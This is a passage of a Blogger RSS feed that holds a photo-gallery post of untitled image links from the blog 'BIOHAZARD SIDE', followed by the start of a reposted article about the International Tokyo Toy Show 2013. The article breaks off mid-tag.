&lt;a href="http://3.bp.blogspot.com/-Fe_TC6F84nE/UeYkHEjBJwI/AAAAAAAAc6E/_Mt5cfQoCUc/s1600/100_2159.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-Fe_TC6F84nE/UeYkHEjBJwI/AAAAAAAAc6E/_Mt5cfQoCUc/s320/100_2159.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-P_GLwUxELpI/UeYkUt7rZoI/AAAAAAAAc6c/-9_4hunxnbo/s1600/100_2160.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-P_GLwUxELpI/UeYkUt7rZoI/AAAAAAAAc6c/-9_4hunxnbo/s320/100_2160.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-QDhH7YNXE-I/UeYkV54rZjI/AAAAAAAAc6s/BbrDRT-jlbw/s1600/100_2161.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-QDhH7YNXE-I/UeYkV54rZjI/AAAAAAAAc6s/BbrDRT-jlbw/s320/100_2161.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-14QP3Cy-iFM/UeYkVVE3WKI/AAAAAAAAc6k/TH_Mry8DLUs/s1600/100_2163.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-14QP3Cy-iFM/UeYkVVE3WKI/AAAAAAAAc6k/TH_Mry8DLUs/s320/100_2163.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-inWpGNyotMI/UeYk2X10xkI/AAAAAAAAc7c/4kR2HRPywGw/s1600/100_2173.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-inWpGNyotMI/UeYk2X10xkI/AAAAAAAAc7c/4kR2HRPywGw/s320/100_2173.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Jtnu_VOtNgo/UeYk1CEz1pI/AAAAAAAAc7U/NujcCqrr3kM/s1600/100_2172.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-Jtnu_VOtNgo/UeYk1CEz1pI/AAAAAAAAc7U/NujcCqrr3kM/s320/100_2172.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-hrWod01T0D8/UeYkrH0fo5I/AAAAAAAAc7M/kbVIPC-LJqQ/s1600/100_2171.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-hrWod01T0D8/UeYkrH0fo5I/AAAAAAAAc7M/kbVIPC-LJqQ/s320/100_2171.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-fClz1dEVzwg/UeYkjYFvxdI/AAAAAAAAc7E/IBeVQNYHYa0/s1600/100_2170.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-fClz1dEVzwg/UeYkjYFvxdI/AAAAAAAAc7E/IBeVQNYHYa0/s320/100_2170.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-jbAO44IqjdA/UeYki3GlFpI/AAAAAAAAc68/UhPrxVamIqw/s1600/100_2169.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-jbAO44IqjdA/UeYki3GlFpI/AAAAAAAAc68/UhPrxVamIqw/s320/100_2169.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-1iljF6p4ZOg/UeYkd0UbQSI/AAAAAAAAc60/UBxxgdSTTrE/s1600/100_2167.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-1iljF6p4ZOg/UeYkd0UbQSI/AAAAAAAAc60/UBxxgdSTTrE/s320/100_2167.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-SeXRTzRL9q4/UeYk_5K9QtI/AAAAAAAAc7k/maYz07vYgdU/s1600/100_2175.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-SeXRTzRL9q4/UeYk_5K9QtI/AAAAAAAAc7k/maYz07vYgdU/s320/100_2175.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-xFlv4HLrV6Y/UeYlHPx8uqI/AAAAAAAAc7s/87XTitTThQ8/s1600/100_2177.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-xFlv4HLrV6Y/UeYlHPx8uqI/AAAAAAAAc7s/87XTitTThQ8/s320/100_2177.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-h5vFOKvU_04/UeYlI549lmI/AAAAAAAAc70/kjZNYfxGKwc/s1600/100_2178.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-h5vFOKvU_04/UeYlI549lmI/AAAAAAAAc70/kjZNYfxGKwc/s320/100_2178.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7PylxFnQTTo/UeYlXLm250I/AAAAAAAAc8M/hsLaEOKR2n0/s1600/100_2180.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-7PylxFnQTTo/UeYlXLm250I/AAAAAAAAc8M/hsLaEOKR2n0/s320/100_2180.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-CZ3f-N5ssZg/UeYl0UwhgiI/AAAAAAAAc88/_x0k6k2HH9I/s1600/100_2191.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-CZ3f-N5ssZg/UeYl0UwhgiI/AAAAAAAAc88/_x0k6k2HH9I/s320/100_2191.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-DeWdPTEFFCo/UeYlty7F9PI/AAAAAAAAc8s/ZBpC4-D7sGE/s1600/100_2190.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-DeWdPTEFFCo/UeYlty7F9PI/AAAAAAAAc8s/ZBpC4-D7sGE/s320/100_2190.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/--GdsohsJvq8/UeYlrWcMcsI/AAAAAAAAc8k/2aS1fei8vFs/s1600/100_2186.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/--GdsohsJvq8/UeYlrWcMcsI/AAAAAAAAc8k/2aS1fei8vFs/s320/100_2186.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-m_y2XeCFcUc/UeYlrNTBiEI/AAAAAAAAc8g/t1joBWxZ91w/s1600/100_2184.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-m_y2XeCFcUc/UeYlrNTBiEI/AAAAAAAAc8g/t1joBWxZ91w/s320/100_2184.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-pEhudXDDJM0/UeYleYyh3tI/AAAAAAAAc8U/7x05hPkTicQ/s1600/100_2182.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-pEhudXDDJM0/UeYleYyh3tI/AAAAAAAAc8U/7x05hPkTicQ/s320/100_2182.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Lsl5MtmDu2s/UeYlXOycd_I/AAAAAAAAc8I/M8eYMsVqSa4/s1600/100_2181.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-Lsl5MtmDu2s/UeYlXOycd_I/AAAAAAAAc8I/M8eYMsVqSa4/s320/100_2181.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-gCvwJ7RWMYU/UeYl27If0FI/AAAAAAAAc9E/k3mPFkGSPH4/s1600/100_2194.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-gCvwJ7RWMYU/UeYl27If0FI/AAAAAAAAc9E/k3mPFkGSPH4/s320/100_2194.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-4J439r5Nncg/UeYl9YdsUtI/AAAAAAAAc9Q/pQKF6hUUuVo/s1600/100_2195.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-4J439r5Nncg/UeYl9YdsUtI/AAAAAAAAc9Q/pQKF6hUUuVo/s320/100_2195.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-fppoMnXDN6Q/UeYlzwZF9OI/AAAAAAAAc80/OkTp3-u8dYA/s1600/100_2193.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-fppoMnXDN6Q/UeYlzwZF9OI/AAAAAAAAc80/OkTp3-u8dYA/s320/100_2193.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-x_34Da6ZEBs/UeYl9bB2yAI/AAAAAAAAc9U/59hgUHEEhcY/s1600/100_2196.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-x_34Da6ZEBs/UeYl9bB2yAI/AAAAAAAAc9U/59hgUHEEhcY/s320/100_2196.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-FKTs-0GNdVg/UeYl-b1LBXI/AAAAAAAAc9c/3nvkChUCpE8/s1600/100_2197.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-FKTs-0GNdVg/UeYl-b1LBXI/AAAAAAAAc9c/3nvkChUCpE8/s320/100_2197.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-v7Z3QPuAQq8/UeYmPKcBodI/AAAAAAAAc-I/L9XGjMHV8Qo/s1600/100_2205.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-v7Z3QPuAQq8/UeYmPKcBodI/AAAAAAAAc-I/L9XGjMHV8Qo/s320/100_2205.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7tKPucTd2M4/UeYmPYcst1I/AAAAAAAAc-M/pUOCZuTGrPQ/s1600/100_2204.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-7tKPucTd2M4/UeYmPYcst1I/AAAAAAAAc-M/pUOCZuTGrPQ/s320/100_2204.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-EC167t7yegI/UeYmG_uHWbI/AAAAAAAAc90/bT96eiKeobU/s1600/100_2203.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-EC167t7yegI/UeYmG_uHWbI/AAAAAAAAc90/bT96eiKeobU/s320/100_2203.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-gKuTKwqP6zg/UeYmGYkfwII/AAAAAAAAc9s/CCjpiEfPHSk/s1600/100_2201.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-gKuTKwqP6zg/UeYmGYkfwII/AAAAAAAAc9s/CCjpiEfPHSk/s320/100_2201.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-h9nPI9muvOE/UeYmGRNZMVI/AAAAAAAAc9o/JqhIz99BRbs/s1600/100_2199.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-h9nPI9muvOE/UeYmGRNZMVI/AAAAAAAAc9o/JqhIz99BRbs/s320/100_2199.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-uxP4jN0XshQ/UeYmO25A6kI/AAAAAAAAc-A/QC89JzQP2Ec/s1600/100_2207.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-uxP4jN0XshQ/UeYmO25A6kI/AAAAAAAAc-A/QC89JzQP2Ec/s320/100_2207.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-xg8laayQ2Nc/UeYmXM35P9I/AAAAAAAAc-U/1F19ZR-AMbU/s1600/100_2210.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-xg8laayQ2Nc/UeYmXM35P9I/AAAAAAAAc-U/1F19ZR-AMbU/s320/100_2210.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-eniS0Ohux8E/UeYmY-jTWkI/AAAAAAAAc-g/PDgY5w6bWUQ/s1600/100_2214.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-eniS0Ohux8E/UeYmY-jTWkI/AAAAAAAAc-g/PDgY5w6bWUQ/s320/100_2214.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-8qWPcpkW5sY/UeYmfynSoRI/AAAAAAAAc-s/bnojzyYd6S8/s1600/100_2216.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-8qWPcpkW5sY/UeYmfynSoRI/AAAAAAAAc-s/bnojzyYd6S8/s320/100_2216.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-egYSR3tjthw/UeYmqQnP2sI/AAAAAAAAc_M/Pkg7dam-qag/s1600/100_2220.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-egYSR3tjthw/UeYmqQnP2sI/AAAAAAAAc_M/Pkg7dam-qag/s320/100_2220.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-sEEK8cLkK9Y/UeYmoaYlNoI/AAAAAAAAc_E/PAsCVWEZROo/s1600/100_2219.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-sEEK8cLkK9Y/UeYmoaYlNoI/AAAAAAAAc_E/PAsCVWEZROo/s320/100_2219.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-a1HdqKi1ONU/UeYmh9F6-jI/AAAAAAAAc-4/vE0pcm6MYYM/s1600/100_2218.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-a1HdqKi1ONU/UeYmh9F6-jI/AAAAAAAAc-4/vE0pcm6MYYM/s320/100_2218.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-aCXEBxcN_6o/UeYmh4-kSzI/AAAAAAAAc-8/unDRPNoAqJc/s1600/100_2217.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-aCXEBxcN_6o/UeYmh4-kSzI/AAAAAAAAc-8/unDRPNoAqJc/s320/100_2217.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-6OF6TJoHE30/UeYmsPFsFUI/AAAAAAAAc_U/auLMofIDIc4/s1600/100_2221.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-6OF6TJoHE30/UeYmsPFsFUI/AAAAAAAAc_U/auLMofIDIc4/s320/100_2221.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-L_9TJqip5Ik/UeYmyU8TPDI/AAAAAAAAc_c/xZP_3oVewpU/s1600/100_2222.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-L_9TJqip5Ik/UeYmyU8TPDI/AAAAAAAAc_c/xZP_3oVewpU/s320/100_2222.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EP1G8SZVn-s/UeYm0GK6eUI/AAAAAAAAc_k/Y1xOS5MyhIc/s1600/100_2224.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-EP1G8SZVn-s/UeYm0GK6eUI/AAAAAAAAc_k/Y1xOS5MyhIc/s320/100_2224.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-NS1UMJQA6OI/UeYm2Kn7zMI/AAAAAAAAc_s/G5Z65Qfs0K0/s1600/100_2225.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-NS1UMJQA6OI/UeYm2Kn7zMI/AAAAAAAAc_s/G5Z65Qfs0K0/s320/100_2225.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-U4K839O2Rt8/UeYnCkdsloI/AAAAAAAAdAM/zrW34_z7UxM/s1600/100_2229.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-U4K839O2Rt8/UeYnCkdsloI/AAAAAAAAdAM/zrW34_z7UxM/s320/100_2229.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-uP6XcZwJgq0/UeYnCO4ZBMI/AAAAAAAAdAI/gexslcUt3-Q/s1600/100_2228.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-uP6XcZwJgq0/UeYnCO4ZBMI/AAAAAAAAdAI/gexslcUt3-Q/s320/100_2228.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Ozlsn0VlNAU/UeYm9xdCMtI/AAAAAAAAc_8/M-fzOIwj9j8/s1600/100_2227.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-Ozlsn0VlNAU/UeYm9xdCMtI/AAAAAAAAc_8/M-fzOIwj9j8/s320/100_2227.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-rcFsN8Tm-ME/UeYm6IjX9dI/AAAAAAAAc_0/AstIBn2V7bE/s1600/100_2226.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-rcFsN8Tm-ME/UeYm6IjX9dI/AAAAAAAAc_0/AstIBn2V7bE/s320/100_2226.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-rK49lfTsV9A/UeYnFB2sirI/AAAAAAAAdAU/728QUMda9_E/s1600/100_2230.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-rK49lfTsV9A/UeYnFB2sirI/AAAAAAAAdAU/728QUMda9_E/s320/100_2230.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/--1DiyaSCR70/UeYnJzr8WAI/AAAAAAAAdAc/5Ha9x9vYatU/s1600/100_2232.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/--1DiyaSCR70/UeYnJzr8WAI/AAAAAAAAdAc/5Ha9x9vYatU/s320/100_2232.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-4zgOZQRXNv0/UeYnLUteuyI/AAAAAAAAdAs/OpjEQiqB1MI/s1600/100_2235.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-4zgOZQRXNv0/UeYnLUteuyI/AAAAAAAAdAs/OpjEQiqB1MI/s320/100_2235.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-BTLAqWX_2G0/UeYnKVf5tCI/AAAAAAAAdAk/rnwr8I5h9Qk/s1600/100_2233.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-BTLAqWX_2G0/UeYnKVf5tCI/AAAAAAAAdAk/rnwr8I5h9Qk/s320/100_2233.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/07/cualquier-cosa.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-ppeJT0ebcNw/UcEhhFuvmqI/AAAAAAAAcuc/e6cdwJC75cg/s72-c/100_2060.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-7808746276836553382</guid><pubDate>Thu, 20 Jun 2013 19:29:00 +0000</pubDate><atom:updated>2013-06-20T14:29:17.857-05:00</atom:updated><title>International Tokyo Toy Show</title><description>&lt;a href="http://feedproxy.google.com/~r/dannychoo_com_main_article_feed_eng/~3/u-X-xm0G3_k/International+Tokyo+Toy+Show.html"&gt;International Tokyo Toy Show&lt;/a&gt;: &lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173165"&gt;&lt;img alt="9075432172_e989710bde_o" height="523" src="http://farm3.staticflickr.com/2832/9075432172_e989710bde_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The &lt;a href="http://www.toys.or.jp/toyshow/index_en.html"&gt;International Tokyo Toy Show 2013&lt;/a&gt; took place last weekend and we went down to take a gander at the various toys that they had on display. Unlike the Wonfes, TAF or ACE, the Tokyo Toy Show is largely mainstream toys aimed at the younger audience.&lt;br /&gt;&lt;br /&gt;We take a lookie at goodies by Bandai, Takara Tomy, Sega Toys, Bushiroad, Lego, Happinet, Fisher Price, Line, Nintendo (Pokemon), Nerf and more.&lt;br /&gt;&lt;br /&gt;First up - life-size Precure figures. How many of you fancy having these around your garden?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173106"&gt;&lt;img alt="9073203475_87a3e0dc64_o" height="523" src="http://farm6.staticflickr.com/5488/9073203475_87a3e0dc64_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Entrance fee for Buyer's Days for most events are free - just bring a copy of your &lt;a href="http://www.dannychoo.com/en/post/26714/Business+Card+Template.html"&gt;business card&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173107"&gt;&lt;img alt="9073203869_6f4ee5e3a0_o" height="523" src="http://farm8.staticflickr.com/7451/9073203869_6f4ee5e3a0_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Heading to the Tokyo Big Site East Hall 1-4.&lt;br /&gt;&lt;a 